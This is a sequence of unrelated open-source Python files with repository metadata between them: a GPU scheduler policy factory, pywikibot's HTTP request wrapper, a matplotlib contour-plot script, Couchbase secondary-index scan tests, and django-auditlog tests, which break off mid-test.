allox.AlloXPolicy(alpha=alpha) elif policy_name == 'fifo': policy = fifo.FIFOPolicy(seed=seed) elif policy_name == 'fifo_perf': policy = fifo.FIFOPolicyWithPerf() elif policy_name == 'fifo_packed': policy = fifo.FIFOPolicyWithPacking() elif policy_name == 'finish_time_fairness': policy = finish_time_fairness.FinishTimeFairnessPolicy(solver=solver, num_threads=num_threads) elif policy_name == 'finish_time_fairness_perf': policy = \ finish_time_fairness.FinishTimeFairnessPolicyWithPerf(solver=solver, num_threads=num_threads) elif policy_name == 'finish_time_fairness_packed': policy = \ finish_time_fairness.FinishTimeFairnessPolicyWithPacking( solver=solver, num_threads=num_threads) elif policy_name == 'gandiva': policy = gandiva.GandivaPolicy(seed=seed) elif policy_name == 'isolated': policy = isolated.IsolatedPolicy() elif policy_name == 'max_min_fairness': policy = max_min_fairness.MaxMinFairnessPolicy(solver=solver) elif policy_name == 'max_min_fairness_perf': policy = max_min_fairness.MaxMinFairnessPolicyWithPerf(solver=solver, num_threads=num_threads) elif policy_name == 'max_min_fairness_packed': policy = \ max_min_fairness.MaxMinFairnessPolicyWithPacking(solver=solver, num_threads=num_threads) elif policy_name == 'max_min_fairness_water_filling': policy = max_min_fairness_water_filling.MaxMinFairnessWaterFillingPolicy( priority_reweighting_policies=priority_reweighting_policies) elif policy_name == 'max_min_fairness_water_filling_perf': policy = max_min_fairness_water_filling.MaxMinFairnessWaterFillingPolicyWithPerf( priority_reweighting_policies=priority_reweighting_policies) elif policy_name == 'max_min_fairness_water_filling_packed': policy = max_min_fairness_water_filling.MaxMinFairnessWaterFillingPolicyWithPacking( priority_reweighting_policies=priority_reweighting_policies) elif policy_name == 'max_sum_throughput_perf': policy = max_sum_throughput.ThroughputSumWithPerf(solver=solver, num_threads=num_threads) elif policy_name == 'max_sum_throughput_normalized_by_cost_perf': policy = max_sum_throughput.ThroughputNormalizedByCostSumWithPerf( solver=solver, num_threads=num_threads) elif policy_name == 'max_sum_throughput_normalized_by_cost_perf_SLOs': policy = max_sum_throughput.ThroughputNormalizedByCostSumWithPerfSLOs( solver=solver, num_threads=num_threads) elif policy_name == 'max_sum_throughput_normalized_by_cost_packed_SLOs': policy = \ max_sum_throughput.ThroughputNormalizedByCostSumWithPackingSLOs( solver=solver, num_threads=num_threads) elif policy_name == 'min_total_duration': policy = min_total_duration.MinTotalDurationPolicy(solver=solver, num_threads=num_threads) elif policy_name == 'min_total_duration_perf': policy = min_total_duration.MinTotalDurationPolicyWithPerf(solver=solver, num_threads=num_threads) elif policy_name == 'min_total_duration_packed': policy = \ min_total_duration.MinTotalDurationPolicyWithPacking(solver=solver, num_threads=num_threads) else: raise ValueError('Unknown policy!') return policy def parse_trace(trace_file): jobs = [] arrival_times = [] with open(trace_file, 'r') as f: for line in f: (job_type, command, working_directory, num_steps_arg, needs_data_dir, total_steps, scale_factor, priority_weight, SLO, arrival_time) = line.split('\t') assert(int(scale_factor) >= 1) jobs.append(Job(job_id=None, job_type=job_type, command=command, working_directory=working_directory, needs_data_dir=bool(int(needs_data_dir)), num_steps_arg=num_steps_arg, total_steps=int(total_steps), duration=None, scale_factor=int(scale_factor), priority_weight=float(priority_weight), SLO=float(SLO))) arrival_times.append(float(arrival_time)) return jobs, arrival_times def print_allocation(allocation, current_time=None): """Prints the allocation. Debug method used for printing the allocation of each job on each worker type. """ print('=' * 80) if current_time is not None: print('Allocation\t(Current_time: %f)' % (current_time)) print('-' * 80) for job_id in sorted(list(allocation.keys())): allocation_str = 'Job ID %s:' % (job_id) for worker_type in sorted(list(allocation[job_id].keys())): value = allocation[job_id][worker_type] allocation_str += ' [%s: %f]' % (worker_type, value) print(allocation_str) print('=' * 80)
41.378182
97
0.610994
6c6f72a68abcba50195a52f81db48437b09bf58a
5,541
py
Python
pywikibot/comms/threadedhttp.py
valhallasw/pywikibot-core
32a8c3c1298a5cb077381fe202daefde82c1c5d3
[ "MIT" ]
null
null
null
pywikibot/comms/threadedhttp.py
valhallasw/pywikibot-core
32a8c3c1298a5cb077381fe202daefde82c1c5d3
[ "MIT" ]
null
null
null
pywikibot/comms/threadedhttp.py
valhallasw/pywikibot-core
32a8c3c1298a5cb077381fe202daefde82c1c5d3
[ "MIT" ]
null
null
null
# -*- coding: utf-8 -*- """Http backend layer, formerly providing a httplib2 wrapper.""" from __future__ import unicode_literals # (C) Pywikibot team, 2007-2015 __version__ = '$Id: 6c6f72a68abcba50195a52f81db48437b09bf58a $' __docformat__ = 'epytext' # standard python libraries import codecs import sys if sys.version_info[0] > 2: from urllib.parse import urlparse else: from urlparse import urlparse import pywikibot from pywikibot.tools import UnicodeMixin _logger = "comm.threadedhttp" class HttpRequest(UnicodeMixin): """Object wrapper for HTTP requests that need to block origin thread. self.data will be either: * a tuple of (dict, unicode) if the request was successful * an exception """ def __init__(self, uri, method="GET", body=None, headers=None, callbacks=None, charset=None, **kwargs): """ Constructor. See C{Http.request} for parameters. """ self.uri = uri self.method = method self.body = body self.headers = headers if isinstance(charset, codecs.CodecInfo): self.charset = charset.name elif charset: self.charset = charset elif headers and 'accept-charset' in headers: self.charset = headers['accept-charset'] else: self.charset = None self.callbacks = callbacks self.args = [uri, method, body, headers] self.kwargs = kwargs self._parsed_uri = None self._data = None @property def data(self): """Return the requests response tuple.""" assert(self._data is not None) return self._data @data.setter def data(self, value): """Set the requests response and invoke each callback.""" self._data = value if self.callbacks: for callback in self.callbacks: callback(self) @property def exception(self): """Get the exception, if any.""" if isinstance(self.data, Exception): return self.data @property def response_headers(self): """Return the response headers.""" if not self.exception: return self.data.headers @property def raw(self): """Return the raw response body.""" if not self.exception: return self.data.content @property def parsed_uri(self): """Return the parsed requested uri.""" if not self._parsed_uri: self._parsed_uri = urlparse(self.uri) return self._parsed_uri @property def hostname(self): """Return the host of the request.""" return self.parsed_uri.netloc @property def status(self): """HTTP response status. @rtype: int """ if not self.exception: return self.data.status_code @property def header_encoding(self): """Return charset given by the response header.""" if not hasattr(self, '_header_encoding'): pos = self.response_headers['content-type'].find('charset=') if pos >= 0: pos += len('charset=') encoding = self.response_headers['content-type'][pos:] self._header_encoding = encoding else: self._header_encoding = None return self._header_encoding @property def encoding(self): """Detect the response encoding.""" if not hasattr(self, '_encoding'): if not self.charset and not self.header_encoding: pywikibot.log(u"Http response doesn't contain a charset.") charset = 'latin1' else: charset = self.charset if (self.header_encoding and codecs.lookup(self.header_encoding) != (codecs.lookup(charset) if charset else None)): if charset: pywikibot.warning( 'Encoding "{0}" requested but "{1}" ' 'received in the header.'.format( charset, self.header_encoding)) try: # TODO: Buffer decoded content, weakref does remove it too # early (directly after this method) self.raw.decode(self.header_encoding) except UnicodeError as e: self._encoding = e else: self._encoding = self.header_encoding else: self._encoding = None if charset and (isinstance(self._encoding, Exception) or not self._encoding): try: self.raw.decode(charset) except UnicodeError as e: self._encoding = e else: self._encoding = charset if isinstance(self._encoding, Exception): raise self._encoding return self._encoding def decode(self, encoding, errors='strict'): """Return the decoded response.""" return self.raw.decode(encoding, errors) @property def content(self): """Return the response decoded by the detected encoding.""" return self.decode(self.encoding) def __unicode__(self): """Return the response decoded by the detected encoding.""" return self.content def __bytes__(self): """Return the undecoded response.""" return self.raw
29.951351
79
0.571016
a6929c9d4a47ecf5f13127f442f4eba791ce3748
1,249
py
Python
utils/create_contour_plots.py
sho-87/python-machine-learning
439556ad5faf549acb8e3923bfed7814fcb1a8ac
[ "MIT" ]
3
2016-11-25T20:34:23.000Z
2019-09-25T08:03:54.000Z
utils/create_contour_plots.py
sho-87/python-machine-learning
439556ad5faf549acb8e3923bfed7814fcb1a8ac
[ "MIT" ]
null
null
null
utils/create_contour_plots.py
sho-87/python-machine-learning
439556ad5faf549acb8e3923bfed7814fcb1a8ac
[ "MIT" ]
4
2017-09-26T01:48:32.000Z
2019-08-09T22:08:01.000Z
import numpy as np import matplotlib.pyplot as plt f, (ax1, ax2) = plt.subplots(1, 2, sharey=False,figsize=(8,4)) # Subplot 1 (left) xlist = np.linspace(-4.0, 4.0, 100) ylist = np.linspace(-2.0, 2.0, 100) X, Y = np.meshgrid(xlist, ylist) Z = np.sqrt(X ** 2 + Y ** 2 ) levels = [0.0, 0.2, 0.5, 0.9, 1.5, 2.5, 3.5] contour1 = ax1.contour(X, Y, Z, levels) # Create legend items lines = [] for i in range(len(levels)): lines.append(contour1.collections[i]) # Subplot 2 (right) xlist = np.linspace(-4.0, 4.0, 100) ylist = np.linspace(-4, 4, 100) X, Y = np.meshgrid(xlist, ylist) Z = np.sqrt(X ** 2 + Y ** 2 ) levels = [0.0, 0.2, 0.5, 0.9, 1.5, 2.5, 3.5] contour2 = ax2.contour(X, Y, Z, levels) # set titles f.suptitle('Contour Plots', fontweight="bold", size=14) ax1.set_title('Raw', fontweight="bold") ax2.set_title('Standardized', fontweight="bold") ax1.grid(True) ax1.set_xticklabels([]) ax1.set_yticklabels([]) ax1.set_xlabel('Feature 2') ax1.set_ylabel('Feature 1') ax2.grid(True) ax2.set_xticklabels([]) ax2.set_yticklabels([]) ax2.set_xlabel('Feature 2') ax2.set_ylabel('Feature 1') # Adjust layout plt.figlegend(lines, levels, title='Loss', loc="center left", bbox_to_anchor=(0,0.64)) plt.tight_layout() plt.subplots_adjust(top=0.86)
26.020833
86
0.668535
cf41f89ede692069a30d526e22b4f2cb270ebfbc
21,994
py
Python
pytests/gsi/indexscans_gsi.py
couchbaselabs/testrunner-bharath
96af90070da2140cc11c549db7403f5ea3b76d34
[ "Apache-2.0" ]
null
null
null
pytests/gsi/indexscans_gsi.py
couchbaselabs/testrunner-bharath
96af90070da2140cc11c549db7403f5ea3b76d34
[ "Apache-2.0" ]
null
null
null
pytests/gsi/indexscans_gsi.py
couchbaselabs/testrunner-bharath
96af90070da2140cc11c549db7403f5ea3b76d34
[ "Apache-2.0" ]
null
null
null
from .base_gsi import BaseSecondaryIndexingTests import copy from couchbase_helper.query_definitions import QueryDefinition from couchbase_helper.query_definitions import SQLDefinitionGenerator from couchbase_helper.tuq_generators import TuqGenerators QUERY_TEMPLATE = "SELECT {0} FROM %s " class SecondaryIndexingScanTests(BaseSecondaryIndexingTests): def setUp(self): super(SecondaryIndexingScanTests, self).setUp() def tearDown(self): super(SecondaryIndexingScanTests, self).tearDown() def suite_setUp(self): pass def suite_tearDown(self): pass def test_create_query_explain_drop_index(self): self.use_primary_index= self.input.param("use_primary_index", False) self.indexes= self.input.param("indexes", "").split(":") self.emitFields= self.input.param("emitFields", "*").split(":") self.whereCondition= self.input.param("whereCondition", None) self.emitFields = ",".join(self.emitFields) query_template = QUERY_TEMPLATE query_template = query_template.format(self.emitFields) self.index_name = "test_create_query_explain_drop_index" run_create_index = True if self.use_primary_index: run_create_index = False run_drop_index = False self.index_name = "primary" if self.whereCondition: query_template += " WHERE {0}".format(self.whereCondition) query_template = self._translate_where_clause(query_template) query_definition = QueryDefinition(index_name=self.index_name, index_fields=self.indexes, query_template=query_template, groups=[]) self.run_multi_operations( buckets = self.buckets, query_definitions = [query_definition], create_index = run_create_index, drop_index = run_drop_index, query_with_explain = self.run_query_with_explain, query = self.run_query) def test_multi_create_query_explain_drop_index(self): try: self._create_index_in_async() self.run_doc_ops() self._query_explain_in_async() self._verify_index_map() except Exception as ex: self.log.info(ex) raise finally: tasks = self.async_run_multi_operations(buckets=self.buckets, query_definitions=self.query_definitions, drop_index=True) self._run_tasks(tasks) def test_multi_create_query_explain_drop_index_with_concurrent_mutations(self): try: kvops_tasks = self.async_run_doc_ops() self._create_index_in_async() # runs operations self._run_tasks(kvops_tasks) self._query_explain_in_async() except Exception as ex: self.log.info(ex) raise finally: tasks = self.async_run_multi_operations(buckets=self.buckets, query_definitions=self.query_definitions, create_index=False, drop_index=True, query_with_explain=False, query=False, scan_consistency=self.scan_consistency) self._run_tasks(tasks) def test_concurrent_mutations_index_create_query_drop(self): self.query_definitions_create_candidates =[] self.query_definitions_query_candidates =[] scan_vector_ranges = [] scan_vectors = None if self.scan_vector_per_values: scan_vector_ranges = self._generate_scan_vector_ranges(self.scan_vector_per_values) if len(scan_vector_ranges) > 0: for use_percentage in scan_vector_ranges: scan_vectors = self.gen_scan_vector(use_percentage=use_percentage, use_random=self.random_scan_vector) try: self.query_definitions_drop_candidates = copy.deepcopy(self.query_definitions) self.query_definitions_create_candidates = copy.deepcopy(self.query_definitions) self.query_definitions_query_candidates = copy.deepcopy(self.query_definitions) i =0 for query_definition in self.query_definitions_drop_candidates: query_definition.index_name += str(i)+"_drop_candidates" i+=1 for query_definition in self.query_definitions_create_candidates: query_definition.index_name += str(i)+"_create_candidates" i+=1 for query_definition in self.query_definitions_query_candidates: query_definition.index_name += str(i)+"_query_candidates" i+=1 # Start Mutations kvops_tasks = self.async_run_doc_ops() # Initialize indexes self._create_index_in_async(query_definitions = self.query_definitions_drop_candidates) self._create_index_in_async(query_definitions = self.query_definitions_query_candidates) self.log.info("<<<<< Run Query Tasks >>>>>>") query_tasks = self.async_run_multi_operations(buckets = self.buckets, query_definitions=self.query_definitions_query_candidates, create_index=False, drop_index=False, query_with_explain=False, query=True, scan_consistency=self.scan_consistency, scan_vectors=scan_vectors) self.log.info("<<<<< Run Drop Tasks >>>>>>") drop_tasks = self.async_run_multi_operations(buckets = self.buckets, query_definitions = self.query_definitions_drop_candidates, create_index = False, drop_index = True, query_with_explain = False, query = False, scan_consistency = self.scan_consistency) self._create_index_in_async(query_definitions = self.query_definitions_create_candidates) # runs operations self._run_tasks(kvops_tasks) self._run_tasks(query_tasks) self._run_tasks(drop_tasks) except Exception as ex: self.log.info(ex) if not scan_vectors: msg = "No scan_vector value" if msg not in str(ex): raise else: raise finally: tasks = self.async_run_multi_operations(buckets = self.buckets, query_definitions = self.query_definitions_create_candidates, create_index = False, drop_index=True, query_with_explain = False, query = False, scan_consistency = self.scan_consistency) self._run_tasks(tasks) tasks = self.async_run_multi_operations(buckets = self.buckets, query_definitions = self.query_definitions_query_candidates, create_index = False, drop_index=True, query_with_explain = False, query = False, scan_consistency = self.scan_consistency) self._run_tasks(tasks) def test_multi_create_query_explain_drop_index_primary(self): qdfs = [] for query_definition in self.query_definitions: query_definition.index_name = "#primary" qdfs.append(query_definition) self.query_definitions = qdfs self.sleep(15) try: self._verify_primary_index_count() self.run_doc_ops() self._verify_primary_index_count() self._query_explain_in_async() except Exception as ex: self.log.info(ex) raise def test_multi_create_query_explain_drop_index_with_index_where_clause(self): query_definition_generator = SQLDefinitionGenerator() self.query_definitions = query_definition_generator.generate_employee_data_query_definitions_for_index_where_clause() self.use_where_clause_in_index = True self.query_definitions = query_definition_generator.filter_by_group(self.groups, self.query_definitions) self.test_multi_create_query_explain_drop_index() def test_multi_create_query_explain_drop_index_with_index_expressions(self): query_definition_generator = SQLDefinitionGenerator() self.query_definitions = query_definition_generator.generate_employee_data_query_definitions_for_index_expressions() self.query_definitions = query_definition_generator.filter_by_group(self.groups, self.query_definitions) self.test_multi_create_query_explain_drop_index() def test_multi_create_query_explain_drop_index_with_index_expressions_and_where_clause(self): self.use_where_clause_in_index = True self.test_multi_create_query_explain_drop_index_with_index_expressions() def test_multi_create_query_explain_drop_index_scan_consistency_with_index_expressions(self): query_definition_generator = SQLDefinitionGenerator() self.query_definitions = query_definition_generator.generate_employee_data_query_definitions_for_index_expressions() self.query_definitions = query_definition_generator.filter_by_group(self.groups, self.query_definitions) self.test_multi_create_query_explain_drop_index_scan_consistency() def test_multi_create_query_explain_drop_index_scan_consistency_with_where_clause(self): query_definition_generator = SQLDefinitionGenerator() self.query_definitions = query_definition_generator.generate_employee_data_query_definitions_for_index_where_clause() self.use_where_clause_in_index = True self.query_definitions = query_definition_generator.filter_by_group(self.groups, self.query_definitions) self.test_multi_create_query_explain_drop_index_scan_consistency() def test_multi_create_query_explain_drop_index_scan_consistency(self): self.random_scan_vector= self.input.param("random_scan_vector", False) scan_vector_ranges = [] scan_vectors = None if self.scan_vector_per_values: scan_vector_ranges = self._generate_scan_vector_ranges(self.scan_vector_per_values) try: self._create_index_in_async() if len(scan_vector_ranges) > 0: for use_percentage in scan_vector_ranges: scan_vectors = self.gen_scan_vector(use_percentage = use_percentage, use_random = self.random_scan_vector) tasks = self.async_run_multi_operations(buckets = self.buckets, query_definitions = self.query_definitions, create_index = False, drop_index = False, query_with_explain = False, query = self.run_query, scan_consistency = self.scan_consistency, scan_vectors = scan_vectors) self._run_tasks(tasks) else: tasks = self.async_run_multi_operations(buckets = self.buckets, query_definitions = self.query_definitions, create_index = False, drop_index = False, query_with_explain = False, query = self.run_query, scan_consistency = self.scan_consistency, scan_vectors = scan_vectors) self._run_tasks(tasks) tasks = self.async_run_multi_operations(buckets = self.buckets, query_definitions = self.query_definitions, create_index = False, drop_index = False, query_with_explain = self.run_query_with_explain, query = False) self._run_tasks(tasks) # runs operations self.run_doc_ops() if self.scan_vector_per_values: scan_vector_ranges = self._generate_scan_vector_ranges(self.scan_vector_per_values) # verify results tasks = self.async_run_multi_operations(buckets = self.buckets, query_definitions = self.query_definitions, create_index = False, drop_index = False, query_with_explain = self.run_query_with_explain, query = False) self._run_tasks(tasks) if len(scan_vector_ranges) > 0: for use_percentage in scan_vector_ranges: scan_vectors = self.gen_scan_vector(use_percentage = use_percentage, use_random = self.random_scan_vector) tasks = self.async_run_multi_operations(buckets = self.buckets, query_definitions = self.query_definitions, create_index = False, drop_index = False, query_with_explain = False, query = self.run_query, scan_consistency = self.scan_consistency, scan_vectors = scan_vectors) self._run_tasks(tasks) else: tasks = self.async_run_multi_operations(buckets = self.buckets, query_definitions = self.query_definitions, create_index = False, drop_index = False, query_with_explain = False, query = self.run_query, scan_consistency = self.scan_consistency, scan_vectors = scan_vectors) self._run_tasks(tasks) except Exception as ex: self.log.info(ex) if self.scan_consistency == "at_plus" and not scan_vectors: msg = "No scan_vector value" if msg not in str(ex): raise else: raise finally: tasks = self.async_run_multi_operations(buckets = self.buckets, query_definitions = self.query_definitions, create_index = False, drop_index=True, query_with_explain = False, query = False) self._run_tasks(tasks) def test_primary_query_scan_consistency(self): self.random_scan_vector= self.input.param("random_scan_vector", False) scan_vector_ranges = [] scan_vectors = None if self.scan_vector_per_values: scan_vector_ranges = self._generate_scan_vector_ranges(self.scan_vector_per_values) try: if len(scan_vector_ranges) > 0: for use_percentage in scan_vector_ranges: scan_vectors = self.gen_scan_vector(use_percentage = use_percentage, use_random = self.random_scan_vector) tasks = self.async_run_multi_operations(buckets = self.buckets, query_definitions = self.query_definitions, create_index = False, drop_index = False, query_with_explain = False, query = self.run_query, scan_consistency = self.scan_consistency, scan_vectors = scan_vectors) self._run_tasks(tasks) else: tasks = self.async_run_multi_operations(buckets = self.buckets, query_definitions = self.query_definitions, create_index = False, drop_index = False, query_with_explain = False, query = self.run_query, scan_consistency = self.scan_consistency, scan_vectors = scan_vectors) self._run_tasks(tasks) # runs operations self.run_doc_ops() if self.scan_vector_per_values: scan_vector_ranges = self._generate_scan_vector_ranges(self.scan_vector_per_values) self._verify_primary_index_count() # verify results if len(scan_vector_ranges) > 0: for use_percentage in scan_vector_ranges: scan_vectors = self.gen_scan_vector(use_percentage = use_percentage, use_random = self.random_scan_vector) tasks = self.async_run_multi_operations(buckets = self.buckets, query_definitions = self.query_definitions, create_index = False, drop_index = False, query_with_explain = False, query = self.run_query, scan_consistency = self.scan_consistency, scan_vectors = scan_vectors) self._run_tasks(tasks) else: tasks = self.async_run_multi_operations(buckets = self.buckets, query_definitions = self.query_definitions, create_index = False, drop_index = False, query_with_explain = False, query = self.run_query, scan_consistency = self.scan_consistency, scan_vectors = scan_vectors) self._run_tasks(tasks) except Exception as ex: self.log.info(ex) if self.scan_consistency == "at_plus" and not scan_vectors: msg = "No scan_vector value" if msg not in str(ex): raise else: raise def test_failure_query_with_non_existing_primary_index(self): self.indexes= self.input.param("indexes", "").split(":") self.emitFields= self.input.param("emitFields", "*").split(":") self.whereCondition= self.input.param("whereCondition", None) self.emitFields = ",".join(self.emitFields) query_template = QUERY_TEMPLATE query_template = query_template.format(self.emitFields) self.index_name = "test_failure_query_with_non_existing_primary_index" if self.whereCondition: query_template += " WHERE {0}".format(self.whereCondition) query_template = self._translate_where_clause(query_template) query_definition = QueryDefinition(index_name=self.index_name, index_fields=self.indexes, query_template=query_template, groups=[]) try: self.run_multi_operations( buckets = self.buckets, query_definitions = [query_definition], create_index = False, drop_index = False, query_with_explain = False, query = self.run_query) self.fail(" querying without indexes and primary indexes is not allowed") except Exception as ex: msg = "No primary index on keyspace default. Use CREATE PRIMARY INDEX to create one." self.assertTrue(msg in str(ex), "did not receive message as expected : {0}".format(ex)) def _generate_scan_vector_ranges(self, scan_vector_per_values = None): scan_vector_per_values = str(scan_vector_per_values) values = scan_vector_per_values.split(":") new_values = [] for val in values: new_values.append(float(val)) return new_values def _run_tasks(self, tasks): for task in tasks: task.result() def _translate_where_clause(self, query): query = query.replace("EQUALS", "==") query = query.replace("NOT_EQUALS", "!=") query = query.replace("LESS_THAN", "<") query = query.replace("LESS_THAN_EQUALS", "<=") query = query.replace("GREATER_THAN", ">") query = query.replace("GREATER_THAN_EQUALS", ">=") return query def _create_index_in_async(self, query_definitions = None, buckets = None, index_nodes = None): refer_index = [] if buckets == None: buckets = self.buckets if query_definitions == None: query_definitions = self.query_definitions if not self.run_async: self.run_multi_operations(buckets=buckets, query_definitions=query_definitions, create_index=True) return if index_nodes == None: index_nodes = self.get_nodes_from_services_map(service_type="index", get_all_nodes=True) x = len(query_definitions) - 1 while x > -1: tasks = [] build_index_map = {} for bucket in buckets: build_index_map[bucket.name] = [] for server in index_nodes: for bucket in buckets: if (x > -1): key = "{0}:{1}".format(bucket.name, query_definitions[x].index_name) if (key not in refer_index): refer_index.append(key) refer_index.append(query_definitions[x].index_name) deploy_node_info = None if self.use_gsi_for_secondary: deploy_node_info = ["{0}:{1}".format(server.ip, server.port)] build_index_map[bucket.name].append(query_definitions[x].index_name) tasks.append(self.async_create_index(bucket.name, query_definitions[x], deploy_node_info=deploy_node_info)) x -= 1 for task in tasks: task.result() if self.defer_build: for bucket_name in list(build_index_map.keys()): if len(build_index_map[bucket_name]) > 0: build_index_task = self.async_build_index(bucket_name, build_index_map[bucket_name]) build_index_task.result() monitor_index_tasks = [] for bucket_name in list(build_index_map.keys()): for index_name in build_index_map[bucket_name]: monitor_index_tasks.append(self.async_monitor_index(bucket_name, index_name)) for task in monitor_index_tasks: task.result()
52.743405
125
0.622352
3b2bb4c51c1c8a2f00ce76586497e59d4dae802b
30,853
py
Python
src/auditlog_tests/tests.py
darwin-homes/django-auditlog
4ee900bb9b2892618b976fa427da0ab215aa012e
[ "MIT" ]
null
null
null
src/auditlog_tests/tests.py
darwin-homes/django-auditlog
4ee900bb9b2892618b976fa427da0ab215aa012e
[ "MIT" ]
null
null
null
src/auditlog_tests/tests.py
darwin-homes/django-auditlog
4ee900bb9b2892618b976fa427da0ab215aa012e
[ "MIT" ]
null
null
null
import datetime import django from django.conf import settings from django.contrib import auth from django.contrib.auth.models import User, AnonymousUser from django.core.exceptions import ValidationError from django.db.models.signals import pre_save from django.http import HttpResponse from django.test import TestCase, RequestFactory from django.utils import dateformat, formats, timezone from dateutil.tz import gettz from auditlog.middleware import AuditlogMiddleware from auditlog.models import LogEntry from auditlog.registry import auditlog from auditlog_tests.models import SimpleModel, AltPrimaryKeyModel, UUIDPrimaryKeyModel, \ ProxyModel, SimpleIncludeModel, SimpleExcludeModel, SimpleMappingModel, RelatedModel, \ ManyRelatedModel, AdditionalDataIncludedModel, DateTimeFieldModel, ChoicesFieldModel, \ CharfieldTextfieldModel, PostgresArrayFieldModel, NoDeleteHistoryModel, AdditionalDataIncludedWithKwargsModel from auditlog import compat class SimpleModelTest(TestCase): def setUp(self): self.obj = SimpleModel.objects.create(text='I am not difficult.') def test_create(self): """Creation is logged correctly.""" # Get the object to work with obj = self.obj # Check for log entries self.assertTrue(obj.history.count() == 1, msg="There is one log entry") try: history = obj.history.get() except obj.history.DoesNotExist: self.assertTrue(False, "Log entry exists") else: self.assertEqual(history.action, LogEntry.Action.CREATE, msg="Action is 'CREATE'") self.assertEqual(history.object_repr, str(obj), msg="Representation is equal") def test_update(self): """Updates are logged correctly.""" # Get the object to work with obj = self.obj # Change something obj.boolean = True obj.save() # Check for log entries self.assertTrue(obj.history.filter(action=LogEntry.Action.UPDATE).count() == 1, msg="There is one log entry for 'UPDATE'") history = obj.history.get(action=LogEntry.Action.UPDATE) self.assertJSONEqual(history.changes, '{"boolean": ["False", "True"]}', msg="The change is correctly logged") def test_delete(self): """Deletion is logged correctly.""" # Get the object to work with obj = self.obj history = obj.history.latest() # Delete the object obj.delete() # Check for log entries self.assertTrue(LogEntry.objects.filter(content_type=history.content_type, object_pk=history.object_pk, action=LogEntry.Action.DELETE).count() == 1, msg="There is one log entry for 'DELETE'") def test_recreate(self): SimpleModel.objects.all().delete() self.setUp() self.test_create() class AltPrimaryKeyModelTest(SimpleModelTest): def setUp(self): self.obj = AltPrimaryKeyModel.objects.create(key=str(datetime.datetime.now()), text='I am strange.') class UUIDPrimaryKeyModelModelTest(SimpleModelTest): def setUp(self): self.obj = UUIDPrimaryKeyModel.objects.create(text='I am strange.') def test_get_for_object(self): self.obj.boolean = True self.obj.save() self.assertEqual(LogEntry.objects.get_for_object(self.obj).count(), 2) def test_get_for_objects(self): self.obj.boolean = True self.obj.save() self.assertEqual(LogEntry.objects.get_for_objects(UUIDPrimaryKeyModel.objects.all()).count(), 2) class ProxyModelTest(SimpleModelTest): def setUp(self): self.obj = ProxyModel.objects.create(text='I am not what you think.') class ManyRelatedModelTest(TestCase): """ Test the behaviour of a many-to-many relationship. """ def setUp(self): self.obj = ManyRelatedModel.objects.create() self.rel_obj = ManyRelatedModel.objects.create() self.obj.related.add(self.rel_obj) def test_related(self): self.assertEqual(LogEntry.objects.get_for_objects(self.obj.related.all()).count(), self.rel_obj.history.count()) self.assertEqual(LogEntry.objects.get_for_objects(self.obj.related.all()).first(), self.rel_obj.history.first()) class MiddlewareTest(TestCase): """ Test the middleware responsible for connecting and disconnecting the signals used in automatic logging. """ def setUp(self): self.middleware = AuditlogMiddleware() self.factory = RequestFactory() self.user = User.objects.create_user(username='test', email='test@example.com', password='top_secret') def test_request_anonymous(self): """No actor will be logged when a user is not logged in.""" # Create a request request = self.factory.get('/') request.user = AnonymousUser() # Run middleware self.middleware.process_request(request) # Validate result self.assertFalse(pre_save.has_listeners(LogEntry)) # Finalize transaction self.middleware.process_exception(request, None) def test_request(self): """The actor will be logged when a user is logged in.""" # Create a request request = self.factory.get('/') request.user = self.user # Run middleware self.middleware.process_request(request) # Validate result self.assertTrue(pre_save.has_listeners(LogEntry)) # Finalize transaction self.middleware.process_exception(request, None) def test_response(self): """The signal will be disconnected when the request is processed.""" # Create a request request = self.factory.get('/') request.user = self.user # Run middleware self.middleware.process_request(request) self.assertTrue(pre_save.has_listeners(LogEntry)) # The signal should be present before trying to disconnect it. self.middleware.process_response(request, HttpResponse()) # Validate result self.assertFalse(pre_save.has_listeners(LogEntry)) def test_exception(self): """The signal will be disconnected when an exception is raised.""" # Create a request request = self.factory.get('/') request.user = self.user # Run middleware self.middleware.process_request(request) self.assertTrue(pre_save.has_listeners(LogEntry)) # The signal should be present before trying to disconnect it. self.middleware.process_exception(request, ValidationError("Test")) # Validate result self.assertFalse(pre_save.has_listeners(LogEntry)) class SimpeIncludeModelTest(TestCase): """Log only changes in include_fields""" def test_register_include_fields(self): sim = SimpleIncludeModel(label='Include model', text='Looong text') sim.save() self.assertTrue(sim.history.count() == 1, msg="There is one log entry") # Change label, record sim.label = 'Changed label' sim.save() self.assertTrue(sim.history.count() == 2, msg="There are two log entries") # Change text, ignore sim.text = 'Short text' sim.save() self.assertTrue(sim.history.count() == 2, msg="There are two log entries") class SimpeExcludeModelTest(TestCase): """Log only changes that are not in exclude_fields""" def test_register_exclude_fields(self): sem = SimpleExcludeModel(label='Exclude model', text='Looong text') sem.save() self.assertTrue(sem.history.count() == 1, msg="There is one log entry") # Change label, ignore sem.label = 'Changed label' sem.save() self.assertTrue(sem.history.count() == 2, msg="There are two log entries") # Change text, record sem.text = 'Short text' sem.save() self.assertTrue(sem.history.count() == 2, msg="There are two log entries") class SimpleMappingModelTest(TestCase): """Diff displays fields as mapped field names where available through mapping_fields""" def test_register_mapping_fields(self): smm = SimpleMappingModel(sku='ASD301301A6', vtxt='2.1.5', not_mapped='Not mapped') smm.save() self.assertTrue(smm.history.latest().changes_dict['sku'][1] == 'ASD301301A6', msg="The diff function retains 'sku' and can be retrieved.") self.assertTrue(smm.history.latest().changes_dict['not_mapped'][1] == 'Not mapped', msg="The diff function does not map 'not_mapped' and can be retrieved.") self.assertTrue(smm.history.latest().changes_display_dict['Product No.'][1] == 'ASD301301A6', msg="The diff function maps 'sku' as 'Product No.' and can be retrieved.") self.assertTrue(smm.history.latest().changes_display_dict['Version'][1] == '2.1.5', msg=("The diff function maps 'vtxt' as 'Version' through verbose_name" " setting on the model field and can be retrieved.")) self.assertTrue(smm.history.latest().changes_display_dict['not mapped'][1] == 'Not mapped', msg=("The diff function uses the django default verbose name for 'not_mapped'" " and can be retrieved.")) class AdditionalDataModelTest(TestCase): """Log additional data if get_additional_data is defined in the model""" def test_model_without_additional_data(self): obj_wo_additional_data = SimpleModel.objects.create(text='No additional ' 'data') obj_log_entry = obj_wo_additional_data.history.get() self.assertIsNone(obj_log_entry.additional_data) def test_model_with_additional_data(self): related_model = SimpleModel.objects.create(text='Log my reference') obj_with_additional_data = AdditionalDataIncludedModel( label='Additional data to log entries', related=related_model) obj_with_additional_data.save() self.assertTrue(obj_with_additional_data.history.count() == 1, msg="There is 1 log entry") log_entry = obj_with_additional_data.history.get() 